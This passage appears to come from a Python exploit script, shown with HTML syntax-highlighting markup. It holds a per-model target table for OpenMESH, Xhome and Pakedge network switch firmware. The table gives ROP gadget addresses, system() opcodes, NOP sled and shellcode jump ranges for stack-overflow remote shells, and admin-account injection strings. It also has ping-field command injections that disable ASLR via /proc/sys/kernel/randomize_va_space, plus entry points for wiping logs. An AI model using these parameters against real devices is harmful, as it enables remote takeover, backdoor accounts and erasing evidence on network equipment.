						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/pingtest_tmp'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x422980</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token comment">#'web_sys_ping_post':0x423168,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/traceroute_tmp #&amp;tr_maxhop=30&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/traceroute_tmp',</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x481968</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x4847DC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x4847DC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42C8F0</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42C8F0</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42C8F0</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_USRNOP&amp;password=_PWDNOP_RA_START&amp;login=1&amp;_USRNOP_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7fff7004</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># OpenMESH (some identical with enginius egs series)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'13984-12788'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'OpenMESH'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'01.03.24_180823-1626'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'OMS24'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.openmesh.com/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E12C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248405a0</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_sys_acctAdd_set()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x424890</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pw=PASSWORD&amp;pv=0&amp;op=1&amp;'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  sn_user_mngSet()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x424890</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;na=USERNAME&amp;pw=&amp;pv=0&amp;op=0'</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># user</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_ipv4PingSet()</span>
						<span class="token comment">#'web_sys_ping_post':0x42341C,	# Jump one after 'sw $ra'			# (address, binary dependent)</span>

														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi;  sn_tracertSet()</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check #&amp;mh=30&amp;uid=0'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span> <span class="token number">0x424248</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x43EA88</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x440660</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x440660</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x425260</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x425260</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x425260</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'security.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x100181A0</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x104006A0</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">987</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">69</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Xhome (identical with Realtek)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-64895'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Xhome'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.0.0.43126'</span><span class="token punctuation">,</span>			<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'DownLoop-G24M'</span><span class="token punctuation">,</span>			<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24841ea8</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/pingtest_tmp'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x4229A0</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/traceroute_tmp #&amp;tr_maxhop=30&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/traceroute_tmp',</span>
						<span class="token comment">#'web_sys_ping_post':0x423188,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x481988</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x4847FC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x4847FC</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42C910</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42C910</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42B6F8</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_USRNOP&amp;password=_PWDNOP_RA_START&amp;login=1&amp;_USRNOP_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7fff7004</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Pakedgedevice &amp; Software</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'225-21785'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'SX-8P'</span><span class="token punctuation">,</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Pakedge'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.04'</span><span class="token punctuation">,</span>							<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C86C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998538</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248492ec</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x413AEC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x413A14</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x413A14</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x4108E4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x4108E4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x4108E4</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
